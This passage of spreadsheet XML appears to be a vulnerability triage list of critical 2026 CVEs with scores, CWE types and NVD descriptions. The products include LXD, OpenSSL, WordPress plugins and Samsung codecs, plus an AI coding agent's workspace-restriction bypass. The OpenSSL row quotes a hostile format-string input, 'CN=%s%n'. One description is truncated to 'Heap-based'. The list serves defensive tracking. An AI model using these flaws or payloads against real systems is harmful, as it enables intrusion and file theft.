      <c r="M11" s="5" t="inlineStr"/>
      <c r="N11" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O11" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="P11" s="5" t="inlineStr"/>
      <c r="Q11" s="5" t="inlineStr">
        <is>
          <t>CWE-732</t>
        </is>
      </c>
      <c r="R11" s="5" t="inlineStr">
        <is>
          <t>An arbitrary file access vulnerability in Mistral Vibe allows an attacker to bypass workspace restrictions through commands classified as unconditionally allowed. Missing path validation for these commands enables access to files outside the active workspace without user approval.</t>
        </is>
      </c>
      <c r="S11" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-87988</t>
        </is>
      </c>
    </row>
    <row r="12">
      <c r="A12" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B12" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C12" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-19232</t>
        </is>
      </c>
      <c r="D12" s="5" t="n">
        <v>9.9</v>
      </c>
      <c r="E12" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F12" s="5" t="inlineStr">
        <is>
          <t>psirt@adobe.com</t>
        </is>
      </c>
      <c r="G12" s="5" t="inlineStr"/>
      <c r="H12" s="5" t="n">
        <v>0.006</v>
      </c>
      <c r="I12" s="5" t="inlineStr"/>
      <c r="J12" s="5" t="inlineStr"/>
      <c r="K12" s="5" t="inlineStr">
        <is>
          <t>adobe:experience_manager</t>
        </is>
      </c>
      <c r="L12" s="5" t="inlineStr"/>
      <c r="M12" s="5" t="inlineStr"/>
      <c r="N12" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O12" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P12" s="5" t="inlineStr"/>
      <c r="Q12" s="5" t="inlineStr">
        <is>
          <t>CWE-863</t>
        </is>
      </c>
      <c r="R12" s="5" t="inlineStr">
        <is>
          <t>Adobe Experience Manager is affected by an Incorrect Authorization vulnerability that could result in arbitrary code execution in the context of the current user, potentially gaining elevated access or control over the victim's account or session. A low-privileged attacker could exploit this vulnerability to gain elevated access or control over the victim's account or session. Exploitation of this issue does not require user interaction. Scope is changed.</t>
        </is>
      </c>
      <c r="S12" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-19232</t>
        </is>
      </c>
    </row>
    <row r="13">
      <c r="A13" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B13" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C13" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-65646</t>
        </is>
      </c>
      <c r="D13" s="5" t="n">
        <v>9.9</v>
      </c>
      <c r="E13" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F13" s="5" t="inlineStr">
        <is>
          <t>support@hackerone.com</t>
        </is>
      </c>
      <c r="G13" s="5" t="inlineStr"/>
      <c r="H13" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="I13" s="5" t="inlineStr"/>
      <c r="J13" s="5" t="inlineStr"/>
      <c r="K13" s="5" t="inlineStr"/>
      <c r="L13" s="5" t="inlineStr"/>
      <c r="M13" s="5" t="inlineStr"/>
      <c r="N13" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O13" s="5" t="inlineStr">
        <is>
          <t>2026-08-26</t>
        </is>
      </c>
      <c r="P13" s="5" t="inlineStr"/>
      <c r="Q13" s="5" t="inlineStr">
        <is>
          <t>CWE-74</t>
        </is>
      </c>
      <c r="R13" s="5" t="inlineStr">
        <is>
          <t>Improper neutralization of special elements in in Plesk's DNS zone management functionality allows remote authenticated users to disclose arbitrary local files and escalate privileges.</t>
        </is>
      </c>
      <c r="S13" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-65646</t>
        </is>
      </c>
    </row>
    <row r="14">
      <c r="A14" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B14" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C14" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-66897</t>
        </is>
      </c>
      <c r="D14" s="5" t="n">
        <v>9.9</v>
      </c>
      <c r="E14" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F14" s="5" t="inlineStr">
        <is>
          <t>security@ubuntu.com</t>
        </is>
      </c>
      <c r="G14" s="5" t="inlineStr"/>
      <c r="H14" s="5" t="n">
        <v>0.007</v>
      </c>
      <c r="I14" s="5" t="inlineStr"/>
      <c r="J14" s="5" t="inlineStr"/>
      <c r="K14" s="5" t="inlineStr">
        <is>
          <t>canonical:lxd</t>
        </is>
      </c>
      <c r="L14" s="5" t="inlineStr"/>
      <c r="M14" s="5" t="inlineStr"/>
      <c r="N14" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O14" s="5" t="inlineStr">
        <is>
          <t>2026-08-24</t>
        </is>
      </c>
      <c r="P14" s="5" t="inlineStr"/>
      <c r="Q14" s="5" t="inlineStr">
        <is>
          <t>CWE-22, CWE-23</t>
        </is>
      </c>
      <c r="R14" s="5" t="inlineStr">
        <is>
          <t>A path traversal vulnerability in LXD's instance template processing allows an attacker with container edit permissions, or any user launching a crafted image, to overwrite arbitrary files on the host system as root. When processing target template paths specified in metadata.yaml, LXD validates the path against a confined os.Root directory handle but subsequently opens and creates the file using os.Create with an unconfined string path. This discrepancy between path resolution checks and file creation allows an attacker to escape directory confinement, overwrite root-owned host files, and achieve host root code execution.</t>
        </is>
      </c>
      <c r="S14" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-66897</t>
        </is>
      </c>
    </row>
    <row r="15">
      <c r="A15" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B15" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C15" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-14559</t>
        </is>
      </c>
      <c r="D15" s="5" t="n">
        <v>9.800000000000001</v>
      </c>
      <c r="E15" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F15" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G15" s="5" t="inlineStr"/>
      <c r="H15" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I15" s="5" t="inlineStr"/>
      <c r="J15" s="5" t="inlineStr"/>
      <c r="K15" s="5" t="inlineStr"/>
      <c r="L15" s="5" t="inlineStr"/>
      <c r="M15" s="5" t="inlineStr"/>
      <c r="N15" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O15" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="P15" s="5" t="inlineStr"/>
      <c r="Q15" s="5" t="inlineStr">
        <is>
          <t>CWE-287</t>
        </is>
      </c>
      <c r="R15" s="5" t="inlineStr">
        <is>
          <t>The teddy-bear-customize-addon WordPress plugin through 1.0.5 does not verify a user's password before authenticating them, allowing unauthenticated attackers to log in as any registered user, including administrators, by supplying only that user's email address.</t>
        </is>
      </c>
      <c r="S15" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-14559</t>
        </is>
      </c>
    </row>
    <row r="16">
      <c r="A16" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B16" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C16" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-14563</t>
        </is>
      </c>
      <c r="D16" s="5" t="n">
        <v>9.800000000000001</v>
      </c>
      <c r="E16" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F16" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G16" s="5" t="inlineStr"/>
      <c r="H16" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I16" s="5" t="inlineStr"/>
      <c r="J16" s="5" t="inlineStr"/>
      <c r="K16" s="5" t="inlineStr"/>
      <c r="L16" s="5" t="inlineStr"/>
      <c r="M16" s="5" t="inlineStr"/>
      <c r="N16" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O16" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="P16" s="5" t="inlineStr"/>
      <c r="Q16" s="5" t="inlineStr">
        <is>
          <t>CWE-287</t>
        </is>
      </c>
      <c r="R16" s="5" t="inlineStr">
        <is>
          <t>The advanced-customized-prompts WordPress plugin through 1.0.1 does not verify the password before issuing an authenticated session for a supplied email address in an unauthenticated action, allowing unauthenticated attackers to log in as any registered user, including administrators, or to create arbitrary new accounts.</t>
        </is>
      </c>
      <c r="S16" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-14563</t>
        </is>
      </c>
    </row>
    <row r="17">
      <c r="A17" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B17" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C17" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-21095</t>
        </is>
      </c>
      <c r="D17" s="5" t="n">
        <v>9.800000000000001</v>
      </c>
      <c r="E17" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F17" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G17" s="5" t="inlineStr"/>
      <c r="H17" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="I17" s="5" t="inlineStr"/>
      <c r="J17" s="5" t="inlineStr"/>
      <c r="K17" s="5" t="inlineStr">
        <is>
          <t>samsung:android</t>
        </is>
      </c>
      <c r="L17" s="5" t="inlineStr"/>
      <c r="M17" s="5" t="inlineStr"/>
      <c r="N17" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O17" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P17" s="5" t="inlineStr"/>
      <c r="Q17" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="R17" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in DNG decoder of libimagecodec.quram.so prior to SMR Sep-2026 Release 1 allows remote attackers to execute arbitrary code.</t>
        </is>
      </c>
      <c r="S17" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-21095</t>
        </is>
      </c>
    </row>
    <row r="18">
      <c r="A18" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B18" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C18" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-21096</t>
        </is>
      </c>
      <c r="D18" s="5" t="n">
        <v>9.800000000000001</v>
      </c>
      <c r="E18" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F18" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G18" s="5" t="inlineStr"/>
      <c r="H18" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="I18" s="5" t="inlineStr"/>
      <c r="J18" s="5" t="inlineStr"/>
      <c r="K18" s="5" t="inlineStr">
        <is>
          <t>samsung:android</t>
        </is>
      </c>
      <c r="L18" s="5" t="inlineStr"/>
      <c r="M18" s="5" t="inlineStr"/>
      <c r="N18" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O18" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P18" s="5" t="inlineStr"/>
      <c r="Q18" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="R18" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in JPEG decoder of libimagecodec.quram.so prior to SMR Sep-2026 Release 1 allows remote attackers to execute arbitrary code.</t>
        </is>
      </c>
      <c r="S18" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-21096</t>
        </is>
      </c>
    </row>
    <row r="19">
      <c r="A19" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B19" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C19" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-52630</t>
        </is>
      </c>
      <c r="D19" s="5" t="n">
        <v>9.800000000000001</v>
      </c>
      <c r="E19" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F19" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G19" s="5" t="inlineStr"/>
      <c r="H19" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="I19" s="5" t="inlineStr"/>
      <c r="J19" s="5" t="inlineStr"/>
      <c r="K19" s="5" t="inlineStr"/>
      <c r="L19" s="5" t="inlineStr"/>
      <c r="M19" s="5" t="inlineStr"/>
      <c r="N19" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O19" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="P19" s="5" t="inlineStr"/>
      <c r="Q19" s="5" t="inlineStr">
        <is>
          <t>CWE-89</t>
        </is>
      </c>
      <c r="R19" s="5" t="inlineStr">
        <is>
          <t>SQL Injection vulnerability in Woltlab WCF v.6.2.4 and before allows a remote attacker to updateUserOptions in UserEditor.class.php and the update action in UserAction.class.php</t>
        </is>
      </c>
      <c r="S19" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-52630</t>
        </is>
      </c>
    </row>
    <row r="20">
      <c r="A20" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B20" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C20" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-53952</t>
        </is>
      </c>
      <c r="D20" s="5" t="n">
        <v>9.800000000000001</v>
      </c>
      <c r="E20" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F20" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G20" s="5" t="inlineStr"/>
      <c r="H20" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I20" s="5" t="inlineStr"/>
      <c r="J20" s="5" t="inlineStr"/>
      <c r="K20" s="5" t="inlineStr"/>
      <c r="L20" s="5" t="inlineStr"/>
      <c r="M20" s="5" t="inlineStr"/>
      <c r="N20" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O20" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="P20" s="5" t="inlineStr"/>
      <c r="Q20" s="5" t="inlineStr">
        <is>
          <t>CWE-285, CWE-306, CWE-489</t>
        </is>
      </c>
      <c r="R20" s="5" t="inlineStr">
        <is>
          <t>GetSimple CMS is a content management system (CMS), and GetSimple CMS CE is the community edition of that CMS. A logic flaw in GetSimple CMS (v3.4.0a and below) and GetSimpleCMS-CE (v3.3.22 and below) allows unauthenticated attackers to create a new administrator account. The application features an automated security control designed to delete the sensitive `admin/setup.php` file post-installation. However, this control is neutralized by a self-exclusion bug within the deletion logic, leaving the setup script accessible for unauthorized account creation even after a legitimate installation is completed. As of time of publication, no known patched versions are available.</t>
        </is>
      </c>
      <c r="S20" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-53952</t>
        </is>
      </c>
    </row>
    <row r="21">
      <c r="A21" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B21" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C21" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-62103</t>
        </is>
      </c>
      <c r="D21" s="5" t="n">
        <v>9.800000000000001</v>
      </c>
      <c r="E21" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F21" s="5" t="inlineStr">
        <is>
          <t>audit@patchstack.com</t>
        </is>
      </c>
      <c r="G21" s="5" t="inlineStr"/>
      <c r="H21" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I21" s="5" t="inlineStr"/>
      <c r="J21" s="5" t="inlineStr"/>
      <c r="K21" s="5" t="inlineStr"/>
      <c r="L21" s="5" t="inlineStr"/>
      <c r="M21" s="5" t="inlineStr"/>
      <c r="N21" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O21" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="P21" s="5" t="inlineStr"/>
      <c r="Q21" s="5" t="inlineStr">
        <is>
          <t>CWE-502</t>
        </is>
      </c>
      <c r="R21" s="5" t="inlineStr">
        <is>
          <t>Unauthenticated PHP Object Injection in Everest Forms &lt;= 3.6.0 versions.</t>
        </is>
      </c>
      <c r="S21" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-62103</t>
        </is>
      </c>
    </row>
    <row r="22">
      <c r="A22" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B22" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C22" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-62105</t>
        </is>
      </c>
      <c r="D22" s="5" t="n">
        <v>9.800000000000001</v>
      </c>
      <c r="E22" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F22" s="5" t="inlineStr">
        <is>
          <t>audit@patchstack.com</t>
        </is>
      </c>
      <c r="G22" s="5" t="inlineStr"/>
      <c r="H22" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I22" s="5" t="inlineStr"/>
      <c r="J22" s="5" t="inlineStr"/>
      <c r="K22" s="5" t="inlineStr"/>
      <c r="L22" s="5" t="inlineStr"/>
      <c r="M22" s="5" t="inlineStr"/>
      <c r="N22" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O22" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="P22" s="5" t="inlineStr"/>
      <c r="Q22" s="5" t="inlineStr">
        <is>
          <t>CWE-502</t>
        </is>
      </c>
      <c r="R22" s="5" t="inlineStr">
        <is>
          <t>Unauthenticated PHP Object Injection in ThemeREX Addons &lt; 2.45.0 versions.</t>
        </is>
      </c>
      <c r="S22" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-62105</t>
        </is>
      </c>
    </row>
    <row r="23">
      <c r="A23" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B23" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C23" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-63073</t>
        </is>
      </c>
      <c r="D23" s="5" t="n">
        <v>9.800000000000001</v>
      </c>
      <c r="E23" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F23" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G23" s="5" t="inlineStr"/>
      <c r="H23" s="5" t="n">
        <v>0.008999999999999999</v>
      </c>
      <c r="I23" s="5" t="inlineStr"/>
      <c r="J23" s="5" t="inlineStr">
        <is>
          <t>openssl</t>
        </is>
      </c>
      <c r="K23" s="5" t="inlineStr">
        <is>
          <t>openssl:openssl</t>
        </is>
      </c>
      <c r="L23" s="5" t="inlineStr"/>
      <c r="M23" s="5" t="inlineStr"/>
      <c r="N23" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O23" s="5" t="inlineStr">
        <is>
          <t>2026-08-25</t>
        </is>
      </c>
      <c r="P23" s="5" t="inlineStr"/>
      <c r="Q23" s="5" t="inlineStr">
        <is>
          <t>CWE-134</t>
        </is>
      </c>
      <c r="R23" s="5" t="inlineStr">
        <is>
          <t>Issue summary: OpenSSL CMP response validation passed an unexpected response
sender distinguished name directly as the format string to `ERR_raise_data()`.
Impact summary: A malicious or intercepted CMP endpoint can crash a CMP client
that enforces an expected sender or uses a pinned server certificate whose
subject becomes the default expected sender.
CWE: CWE-134 (Use of Externally-Controlled Format String)
Description: When validating a received CMP message, ossl_cmp_msg_check_update()
converts the peer-supplied sender distinguished name with X509_NAME_oneline()
and passes it directly as the format argument to ERR_raise_data(). Percent
characters survive the conversion, so a sender DN such as "CN=%s%n" reaches
BIO_vsnprintf() as an attacker-controlled format string with no matching variadic
arguments. This path is only reached when the caller configures an expected
sender or pins a server certificate, which is the normal configuration for a
CMP client validating server responses.
Since the attacker controls the format string but none of the variadic
arguments, such specifiers as %s and %n dereference or write through unrelated
stack contents and crash the client. The reliable consequence is a denial of
service, when the response comes from a malicious or intercepted CMP endpoint.
There is no controlled memory write, arbitrary-address read, or reliable path
to remote code execution.
FIPS impact: no
No FIPS modules are affected by this issue, as the CMP protocol
implementation is outside the OpenSSL FIPS module boundary.</t>
        </is>
      </c>
      <c r="S23" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-63073</t>
        </is>
      </c>
    </row>
    <row r="24">
      <c r="A24" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B24" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C24" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69431</t>
        </is>
      </c>
      <c r="D24" s="5" t="n">
        <v>9.800000000000001</v>
      </c>
      <c r="E24" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F24" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G24" s="5" t="inlineStr"/>
      <c r="H24" s="5" t="n">
        <v>0.008999999999999999</v>
      </c>
      <c r="I24" s="5" t="inlineStr"/>
      <c r="J24" s="5" t="inlineStr"/>
      <c r="K24" s="5" t="inlineStr"/>
      <c r="L24" s="5" t="inlineStr"/>
      <c r="M24" s="5" t="inlineStr"/>
      <c r="N24" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O24" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P24" s="5" t="inlineStr"/>
      <c r="Q24" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="R24" s="5" t="inlineStr">
        <is>
          <t>Heap-based</t>
        </is>
      </c>
      <c r="S24" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69431</t>
        </is>
      </c>
    </row>
    <row r="25">
      <c r="A25" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B25" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C25" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-71644</t>
        </is>
      </c>
      <c r="D25" s="5" t="n">
        <v>9.800000000000001</v>
      </c>
      <c r="E25" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F25" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G25" s="5" t="inlineStr"/>
      <c r="H25" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="I25" s="5" t="inlineStr"/>
      <c r="J25" s="5" t="inlineStr"/>
      <c r="K25" s="5" t="inlineStr"/>
      <c r="L25" s="5" t="inlineStr"/>
      <c r="M25" s="5" t="inlineStr"/>
      <c r="N25" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O25" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="P25" s="5" t="inlineStr"/>
      <c r="Q25" s="5" t="inlineStr">
        <is>
          <t>CWE-843</t>
        </is>
      </c>
      <c r="R25" s="5" t="inlineStr">
        <is>
          <t>An issue in Robotics-STAR-Lab (SYSU STAR Group) RACER Tested affected version: commit abcdef1234567890 allows an attacker to cause unsafe trajectory planning and potential UAV collisions via a missing default case in the FSM that stops publishing swarm trajectories when the drone enters IDLE</t>
        </is>
      </c>
      <c r="S25" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-71644</t>
        </is>
      </c>
    </row>
    <row r="26">
      <c r="A26" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B26" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C26" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-77089</t>
        </is>
      </c>
      <c r="D26" s="5" t="n">
        <v>9.800000000000001</v>
      </c>
      <c r="E26" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F26" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G26" s="5" t="inlineStr"/>
      <c r="H26" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I26" s="5" t="inlineStr"/>
      <c r="J26" s="5" t="inlineStr"/>
      <c r="K26" s="5" t="inlineStr">
        <is>
          <t>commvault:commvault</t>
        </is>
      </c>
      <c r="L26" s="5" t="inlineStr"/>
      <c r="M26" s="5" t="inlineStr"/>
      <c r="N26" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O26" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P26" s="5" t="inlineStr"/>
      <c r="Q26" s="5" t="inlineStr">
        <is>
          <t>CWE-290</t>
        </is>
      </c>
      <c r="R26" s="5" t="inlineStr">
        <is>
          <t>Command Center API contained an authentication bypass issue affecting privilege management. Software customers upgrade to resolved maintenance release. Update Command Center.</t>
        </is>
      </c>
      <c r="S26" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-77089</t>
        </is>
      </c>
    </row>
    <row r="27">
      <c r="A27" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B27" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C27" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-77092</t>
        </is>
      </c>
      <c r="D27" s="5" t="n">
        <v>9.800000000000001</v>
      </c>
      <c r="E27" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F27" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G27" s="5" t="inlineStr"/>
      <c r="H27" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I27" s="5" t="inlineStr"/>
      <c r="J27" s="5" t="inlineStr"/>
      <c r="K27" s="5" t="inlineStr">
        <is>
          <t>commvault:commvault</t>
        </is>
      </c>
      <c r="L27" s="5" t="inlineStr"/>
      <c r="M27" s="5" t="inlineStr"/>
      <c r="N27" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O27" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P27" s="5" t="inlineStr"/>
      <c r="Q27" s="5" t="inlineStr">
        <is>
          <t>CWE-502</t>
        </is>
      </c>
      <c r="R27" s="5" t="inlineStr">
        <is>
          <t>Content Extractor contained a deserialization of untrusted data issue affecting privilege management. Software customers upgrade to resolved maintenance release. Update Content Extractor.</t>
        </is>
      </c>
      <c r="S27" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-77092</t>
        </is>
      </c>
    </row>
    <row r="28">
      <c r="A28" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B28" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C28" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-77098</t>
        </is>
      </c>
      <c r="D28" s="5" t="n">
        <v>9.800000000000001</v>
      </c>
      <c r="E28" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F28" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G28" s="5" t="inlineStr"/>
      <c r="H28" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I28" s="5" t="inlineStr"/>
